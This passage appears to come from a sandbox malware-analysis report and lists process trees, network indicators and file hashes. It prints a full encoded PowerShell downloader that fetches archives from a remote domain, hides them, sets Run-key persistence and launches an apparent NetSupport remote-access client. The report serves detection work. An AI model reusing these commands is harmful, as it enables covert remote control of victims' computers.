3QVZ3QnBBRzRBWkFCdkFIY0Fjd0JjQUVNQWRRQnlBSElBWlFCdUFIUUFWZ0JsQUhJQWN3QnBBRzhBYmdCY0FGSUFkUUJ1QUNjQUlBQXRBRzRBWVFCTkFFVUFJQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FnQUMwQVZnQmhBRXdBZFFCRkFDQUFKQUJoQUVFQVR3QjZBSElBUVFCVUFDQUFMUUJ3QUhJQWJ3QlFBR1VBY2dCMEFGa0FWQUI1QUZBQVpRQWdBQ2NBVXdCMEFISUFhUUJ1QUdjQUp3QTdBQ0FBY3dCVUFFRUFVZ0IwQUMwQVVBQnlBRThBWXdCRkFITUFVd0FnQUdNQWJBQnBBR1VBYmdCMEFETUFNZ0F1QUdVQWVBQmxBRHNB')); Invoke-Expression $script}"

C:\Windows\SysWOW64\cmd.exe

cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/fe4cb4db9fe2a79024e9e07150b10e2f/" && (for %F in (*.exe) do start "" "%F")"

C:\Users\Admin\AppData\Local\Temp\fe4cb4db9fe2a79024e9e07150b10e2f\vlc.exe

"vlc.exe"

C:\Windows\SysWOW64\explorer.exe

explorer C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Users\Admin\AppData\Roaming\LoadbrowserBf_alpha\vlc.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\0e58a5550d9ef809508f7b20ad802f2b.pdf"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nopRo -ExecUTIoNpO BYpaSS -w HId -ec JABpAGUAUQByAGQAOQBkAEMAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGEALwBmADEAYQAuAHoAaQBwACcAOwAgACQASABkAEEAVgB5AHEASAA9AEcAYwBNACAAZQB4AHAAQQBOAGQALQBBAHIAQwBIAEkAVgBlACAALQBFAHIAcgBPAHIAQQBjAFQAaQBPAG4AIABzAEkATABlAE4AVABsAFkAQwBPAG4AVABJAE4AVQBlADsAIAAkAHUAawBYAFgAUgBGAEkAZQA9ACcAbQAzADIAVwBWADUAYgBSAC4AegBpAHAAJwA7ACAAJABSAHIATgBoAEgASQBlAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgA0AGEALgB6AGkAcAAnADsAIAAkAHMAVQBCAHAAYgBmADgAPQAnAEwATwAxAGkAbgBOAEEALgB6AGkAcAAnADsAIAAkAG4ARQA0AEEATgBMAGYAPQBHAGMATQAgAFMAVABhAHIAVAAtAGIAaQBUAHMAdABSAGEAbgBzAGYAZQByACAALQBlAHIAcgBPAFIAYQBjAFQASQBvAE4AIABTAGkAbABlAE4AVABMAHkAYwBvAE4AVABJAG4AdQBFADsAIAAkAGIAbABiAGUAcAB6AFoAPQAnADYARABNAEwAVQAuAHoAaQBwACcAOwAgACQAUgBnAHoANQBXAEwAbgA9ACcAaAB0AHQAcABzADoALwAvAGcAYQBpAGwAcwBhAGMAYQBkAGUAbQB5AC4AYwBvAG0ALwBmAHoAYQAvAGYAMwBhAC4AegBpAHAAJwA7ACAAWwBuAGUAdAAuAHMARQByAHYAaQBDAEUAUABPAEkATgB0AG0AQQBOAEEARwBFAFIAXQA6ADoAcwBlAEMAdQBSAEkAVABZAHAAUgBPAFQAbwBjAE8AbAAgAD0AIABbAE4AZQB0AC4AcwBFAGMAVQBSAEkAVABZAFAAUgBPAHQATwBjAE8ATAB0AFkAcABlAF0AOgA6AFQATABTADEAMgA7ACAAJABJAG4AQwBHADIAMgBWAEoAPQAnAFQAZQBtAHAAQwBvAG4AdAByAG8AbABsACcAOwAgACQANAB5AEYAYwBKAFYASgA9ACcAbAA4AGUARgBWAE8AUwBTAC4AegBpAHAAJwA7ACAAYwBEACAAJABFAG4AdgA6AEEAcABwAGQAYQB0AGEAOwAgACQARAAzAGcAbABwAD0AJwBoAHQAdABwAHMAOgAvAC8AZwBhAGkAbABzAGEAYwBhAGQAZQBtAHkALgBjAG8AbQAvAGYAegBhAC8AZgAyAGEALgB6AGkAcAAnADsAIAAkAEYAYwBtAFYAVwBzAFkAPQAiACQAZQBOAHYAOgBhAFAAUABkAEEAdABBAFwAJABiAGwAYgBlAHAAegBaACIAOwAgACQAeABIAGYANQB4AG8ATQB1AD0AIgAkAGUATgB2ADoAQQBwAHAARABhAHQAQQBcACQAcwBVAEIAcABiAGYAOAAiADsAIAAkAE4AcwBKAHgAdQBZADgAVAA9ACIAewAwAH0AXAB7ADEAfQAiACAALQBmACAAJABlAG4AVgA6AEEAUABwAEQAQQB0AEEALAAgACQAdQBrAFgAWABSAEYASQBlADsAIAAkAGQAMABEADcAWQBwAD0ASgBvAEkATgAtAFAAQQBUAGgAIAAtAHAAQQB0AEgAIAAkAGUAbgBWADoAQQBQAHAARABBAHQAQQAgAC0AYwBIAGkATABkAFAAQQB0AGgAIAAkADQAeQBGAGMASgBWAEoAOwAgACQASwBOADYATQBMAHIAbABqAD0AIgBiAGkAdABzAGEAZABNAEkATgAuAGUAWABlACAALwBUAFIAQQBOAFMAZgBlAFIAIAB0AGIAZQBOAGsAIAAvAEQATwBXAG4ATABPAEEARAAgAC8AUAByAGkAbwBSAEkAVABZACAAbgBvAHIAbQBBAEwAIAB7ADAAfQAgAHsAMQB9ACIAIAAtAGYAIAAkAFIAZwB6ADUAVwBMAG4ALAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAAkAHQAQQA1ADAARQA9ACcAQgBJAFQAUwBBAGQAbQBJAE4ALgBFAHgARQAgAC8AVABSAGEATgBTAGYARQByACAAMAB2AGEAaABsACAALwBEAE8AdwBuAEwATwBBAGQAIAAvAHAAcgBpAE8AUgBpAFQAeQAgAE4ATwByAE0AYQBsACAAJwArACQARAAzAGcAbABwACsAJwAgACcAKwAkAEYAYwBtAFYAVwBzAFkAOwAgACQAMgBxAGYAaABJAG8AZQA9ACIAJABFAG4AdgA6AGEAcABwAEQAQQBUAEEAXAAkAEkAbgBDAEcAMgAyAFYASgAiADsAIAAkAGQAdQBuAFQANwBBAFUAPQAiAGIAaQB0AFMAYQBkAG0ASQBuAC4AZQBYAGUAIAAvAHQAUgBBAE4AUwBmAGUAUgAgAFcARABaAHMATwBnACAALwBkAG8AdwBOAEwAbwBBAEQAIAAvAHAAUgBpAG8AcgBpAFQAeQAgAE4AbwBSAE0AQQBsACAAewAwAH0AIAB7ADEAfQAiACAALQBmACAAJABpAGUAUQByAGQAOQBkAEMALAAgACQAZAAwAEQANwBZAHAAOwAgACQAVwBNAGUAbABoAFoASwA9ACIAYgBpAHQAUwBhAGQAbQBJAG4ALgBlAFgAZQAgAC8AdABSAEEATgBTAGYAZQBSACAAVwBEAFoAcwBPAGcAIAAvAGQAbwB3AE4ATABvAEEARAAgAC8AcABSAGkAbwByAGkAVAB5ACAATgBvAFIATQBBAGwAIAAkAFIAcgBOAGgASABJAGUAIAAkAE4AcwBKAHgAdQBZADgAVAAiADsAIABJAEYAIAAoACQASABkAEEAVgB5AHEASAApACAAewAgAGkARgAgACgAJABuAEUANABBAE4ATABmACkAIAB7ACAAcwB0AEEAUgBUAC0AYgBpAFQAUwB0AHIAQQBOAFMARgBFAHIAIAAtAHMATwBVAFIAQwBFACAAJABEADMAZwBsAHAAIAAtAEQAZQBTAFQAaQBOAEEAVABpAE8ATgAgACQARgBjAG0AVgBXAHMAWQA7ACAAcwB0AEEAcgBUAC0AYgBpAFQAcwB0AFIAQQBOAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAGcAegA1AFcATABuACAALQBkAEUAcwBUAEkATgBBAFQAaQBPAG4AIAAkAHgASABmADUAeABvAE0AdQA7ACAAUwBUAEEAUgB0AC0AQgBJAHQAcwB0AHIAYQBuAFMARgBFAHIAIAAtAHMATwBVAHIAQwBlACAAJABSAHIATgBoAEgASQBlACAALQBEAGUAcwBUAGkATgBhAFQAaQBPAE4AIAAkAE4AcwBKAHgAdQBZADgAVAA7ACAAUwBUAEEAcgBUAC0AQgBJAFQAUwBUAHIAYQBOAHMARgBFAHIAIAAtAHMAbwBVAFIAYwBFACAAJABpAGUAUQByAGQAOQBkAEMAIAAtAGQAZQBzAFQAaQBOAEEAdABJAG8AbgAgACQAZAAwAEQANwBZAHAAOwAgAH0AIABFAGwAUwBlACAAewBpAG4AdgBvAEsAZQAtAGUAWABwAFIAZQBzAFMASQBPAE4AIAAtAEMAbwBNAG0AQQBuAGQAIAAkAEsATgA2AE0ATAByAGwAagA7ACAASQBOAFYAbwBLAEUALQBlAFgAUAByAGUAcwBTAEkAbwBuACAALQBDAE8ATQBNAEEATgBkACAAJAB0AEEANQAwAEUAOwAgAEkARQBYACAALQBDAE8ATQBtAEEAbgBkACAAJABXAE0AZQBsAGgAWgBLADsAIABJAG4AVgBvAEsARQAtAGUAWABQAFIARQBzAFMASQBPAG4AIAAtAEMAbwBtAE0AQQBOAGQAIAAkAGQAdQBuAFQANwBBAFUAOwAgAH0AIABlAFgAcABhAE4AZAAtAGEAUgBDAEgASQBWAEUAIAAtAFAAYQB0AGgAIAAkAHgASABmADUAeABvAE0AdQAgAC0AZABlAHMAdABJAG4AYQBUAEkAbwBuAHAAQQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAGUAeABQAGEATgBkAC0AQQBSAGMASABpAHYARQAgAC0AcABhAHQASAAgACQATgBzAEoAeAB1AFkAOABUACAALQBkAEUAcwBUAGkATgBBAFQAaQBPAG4AcABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AHAAQQBuAEQALQBhAHIAYwBoAGkAdgBFACAALQBQAGEAVABoACAAJABGAGMAbQBWAFcAcwBZACAALQBkAEUAcwB0AGkATgBBAHQASQBvAG4AUABhAHQAaAAgACQAMgBxAGYAaABJAG8AZQA7ACAARQB4AFAAYQBuAGQALQBhAHIAQwBIAGkAdgBFACAALQBQAGEAdABIACAAJABkADAARAA3AFkAcAAgAC0ARABlAFMAdABpAG4AQQB0AEkATwBuAFAAYQB0AEgAIAAkADIAcQBmAGgASQBvAGUAOwAgAHIARQBNAE8AVgBlAC0ASQB0AEUAbQAgAC0AcABhAHQAaAAgACQAZAAwAEQANwBZAHAAOwAgAGUAUgBBAHMARQAgAC0AUABhAHQAaAAgACQARgBjAG0AVgBXAHMAWQA7ACAAZQBSAEEAcwBFACAALQBwAGEAdABoACAAJABOAHMASgB4AHUAWQA4AFQAOwAgAFIARAAgAC0AUABhAHQASAAgACQAeABIAGYANQB4AG8ATQB1ADsAIAB9ACAAZQBsAFMARQAgAHsAIAAkAGgAaQBoAFQAWABTAEoAPQAnAGgAdAB0AHAAcwA6AC8ALwBnAGEAaQBsAHMAYQBjAGEAZABlAG0AeQAuAGMAbwBtAC8AZgB6AGYALwAnADsAIABuAEkAIAAtAHAAYQB0AEgAIAAkAGUAbgBWADoAYQBQAFAARABBAFQAYQAgAC0AbgBhAE0ARQAgACQASQBuAEMARwAyADIAVgBKACAALQBpAHQARQBNAFQAeQBQAEUAIAAnAGQAaQByAGUAYwB0AG8AcgB5ACcAOwAgACQAUwBYAFgAdAA0AD0AQAAoACcAQQB1AGQAaQBvAEMAYQBwAHQAdQByAGUALgBkAGwAbAAnACwAIAAnAGMAbABpAGUAbgB0ADMAMgAuAGkAbgBpACcALAAgACcATgBTAE0ALgBMAEkAQwAnACwAIAAnAFAAQwBJAEMATAAzADIALgBEAEwATAAnACwAIAAnAFQAQwBDAFQATAAzADIALgBEAEwATAAnACwAIAAnAG4AcwBtAF8AdgBwAHIAbwAuAGkAbgBpACcALAAgACcAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAJwAsACAAJwBIAFQAQwBUAEwAMwAyAC4ARABMAEwAJwAsACAAJwBuAHMAawBiAGYAbAB0AHIALgBpAG4AZgAnACwAIAAnAG0AcwB2AGMAcgAxADAAMAAuAGQAbABsACcALAAgACcAUABDAEkAQwBIAEUASwAuAEQATABMACcALAAgACcAcABjAGkAYwBhAHAAaQAuAGQAbABsACcALAAgACcAcgBlAG0AYwBtAGQAcwB0AHUAYgAuAGUAeABlACcAKQA7ACAAaQBGACAAKAAkAG4ARQA0AEEATgBMAGYAKQAgAHsAIAAkAFMAWABYAHQANAAgAHwAIABmAG8AUgBlAEEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACAAJAAxAEwAVgBTAEoAawBVAD0AJABoAGkAaABUAFgAUwBKACsAJABfADsAIAAkAEkAawBOAEoAcgBOAFcAPQBKAG8AaQBuAC0AcABBAHQASAAgAC0AUABBAHQASAAgACQAMgBxAGYAaABJAG8AZQAgAC0AQwBoAGkATABkAFAAQQBUAGgAIAAkAF8AOwAgAFMAdABhAHIAdAAtAEIAaQB0AFMAVAByAEEAbgBzAEYARQBSACAALQBzAG8AdQByAEMAZQAgACQAMQBMAFYAUwBKAGsAVQAgAC0ARABFAFMAVABJAE4AYQB0AEkATwBuACAAJABJAGsATgBKAHIATgBXADsAIAB9ADsAfQAgAGUATABTAEUAIAB7ACAAJABTAFgAWAB0ADQAIAB8ACAAJQAgAHsAIAAkADEATABWAFMASgBrAFUAPQAkAGgAaQBoAFQAWABTAEoAKwAkAF8AOwAgACQASQBrAE4ASgByAE4AVwA9ACIAJAAyAHEAZgBoAEkAbwBlAFwAJABfACIAOwAgACQARQBSAEIAMwBDAFEAMgA9ACcAQgBJAHQAUwBBAEQATQBpAG4ALgBFAFgARQAgAC8AVAByAEEATgBTAGYARQBSACAAcQBWAHQAdgBPACAALwBkAE8AVwBuAGwAbwBBAEQAIAAvAFAAcgBpAE8AcgBJAHQAWQAgAG4ATwByAE0AYQBsACAAJwArACQAMQBMAFYAUwBKAGsAVQArACcAIAAnACsAJABJAGsATgBKAHIATgBXADsAIABJAE4AVgBvAEsARQAtAGUAWABQAHIAZQBzAFMASQBvAG4AIAAtAEMATwBNAE0AQQBOAGQAIAAkAEUAUgBCADMAQwBRADIAOwB9ADsAIAB9ADsAIAB9ADsAIAAkADcAZgA1AG0AegBzAFcAPQBnAGUAdAAtAGkAdABlAG0AIAAkADIAcQBmAGgASQBvAGUAIAAtAEYAbwByAGMARQA7ACAAJAA3AGYANQBtAHoAcwBXAC4AYQBUAFQAUgBJAEIAVQBUAGUAUwA9ACcASABpAGQAZABlAG4AJwA7ACAAJABhAEEATwB6AHIAQQBUAD0ASgBvAGkATgAtAFAAQQB0AGgAIAAtAHAAYQBUAEgAIAAkADIAcQBmAGgASQBvAGUAIAAtAEMASABJAGwARABQAEEAVABoACAAJwBjAGwAaQBlAG4AdAAzADIALgBlAHgAZQAnADsAIABjAGgARABJAFIAIAAkADIAcQBmAGgASQBvAGUAOwAgAE4AZQBXAC0ASQBUAGUATQBQAFIATwBQAGUAUgB0AHkAIAAtAFAAYQBUAGgAIAAnAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACcAIAAtAG4AYQBNAEUAIAAkAEkAbgBDAEcAMgAyAFYASgAgAC0AVgBhAEwAdQBFACAAJABhAEEATwB6AHIAQQBUACAALQBwAHIAbwBQAGUAcgB0AFkAVAB5AFAAZQAgACcAUwB0AHIAaQBuAGcAJwA7ACAAcwBUAEEAUgB0AC0AUAByAE8AYwBFAHMAUwAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsA

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=4EE688E235AC8F138C0204F099AFD0F6 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=DD47AE7F6A97798668302640F90AD693 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=DD47AE7F6A97798668302640F90AD693 --renderer-client-id=2 --mojo-platform-channel-handle=1760 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=712647CD1C93C35264ECFF1E4174BFE1 --mojo-platform-channel-handle=2340 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=0BF2811DA29824B2B61196B77E7E8C92 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=0BF2811DA29824B2B61196B77E7E8C92 --renderer-client-id=5 --mojo-platform-channel-handle=1992 --allow-no-sandbox-job /prefetch:1

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=5BEFC56AD0A9B409506C6FDF9B2C90E2 --mojo-platform-channel-handle=2764 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe

"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=AF9D0A4FD79CABE186088E9BDB3B44B9 --mojo-platform-channel-handle=2436 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2

C:\Users\Admin\AppData\Roaming\TempControll\client32.exe

"C:\Users\Admin\AppData\Roaming\TempControll\client32.exe"

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 45.61.158.86:80 45.61.158.86 tcp
US 8.8.8.8:53 86.158.61.45.in-addr.arpa udp
US 8.8.8.8:53 gailsacademy.com udp
NL 23.254.231.157:443 gailsacademy.com tcp
US 8.8.8.8:53 157.231.254.23.in-addr.arpa udp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
US 8.8.8.8:53 fusion-avto.com udp
US 104.26.0.231:80 geo.netsupportsoftware.com tcp
CH 94.247.42.62:443 fusion-avto.com tcp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 231.0.26.104.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 62.42.247.94.in-addr.arpa udp
US 8.8.8.8:53 135.240.123.92.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 107.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 availabkelk.store udp
US 8.8.8.8:53 questionsmw.store udp
US 8.8.8.8:53 soldiefieop.site udp
US 8.8.8.8:53 abnomalrkmu.site udp
US 8.8.8.8:53 chorusarorp.site udp
US 8.8.8.8:53 treatynreit.site udp
US 8.8.8.8:53 snarlypagowo.site udp
US 8.8.8.8:53 mysterisop.site udp
US 8.8.8.8:53 absorptioniw.site udp
US 8.8.8.8:53 steamcommunity.com udp
GB 104.82.234.109:443 steamcommunity.com tcp
US 8.8.8.8:53 sergei-esenin.com udp
US 104.21.53.8:443 sergei-esenin.com tcp
US 8.8.8.8:53 109.234.82.104.in-addr.arpa udp
US 8.8.8.8:53 8.53.21.104.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe

MD5 5ecd826babbebdd959456c471dec6465
SHA1 f94a596b742c0653ff7201469f133108f17b46e9
SHA256 b2be43c010bc0d268a42a11296829e088d7eef81cc39bfcdc0b9f0e9a65717ea
SHA512 30563a15786f245e4a7ff1b8996f302dbf4b1d4950098d6899815b5065d3058b290a81b6564c19c85cfcd425c08c9f6bac5bc31ba95773978f9a9c5cde123d38

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe

MD5 48c96771106dbdd5d42bba3772e4b414
SHA1 e84749b99eb491e40a62ed2e92e4d7a790d09273
SHA256 a96d26428942065411b1b32811afd4c5557c21f1d9430f3696aa2ba4c4ac5f22
SHA512 9f891c787eb8ceed30a4e16d8e54208fa9b19f72eeec55b9f12d30dc8b63e5a798a16b1ccc8cea3e986191822c4d37aedb556e534d2eb24e4a02259555d56a2c

memory/684-220-0x0000000000400000-0x000000000042F000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr100.dll

MD5 bf38660a9125935658cfa3e53fdc7d65
SHA1 0b51fb415ec89848f339f8989d323bea722bfd70
SHA256 60c06e0fa4449314da3a0a87c1a9d9577df99226f943637e06f61188e5862efa
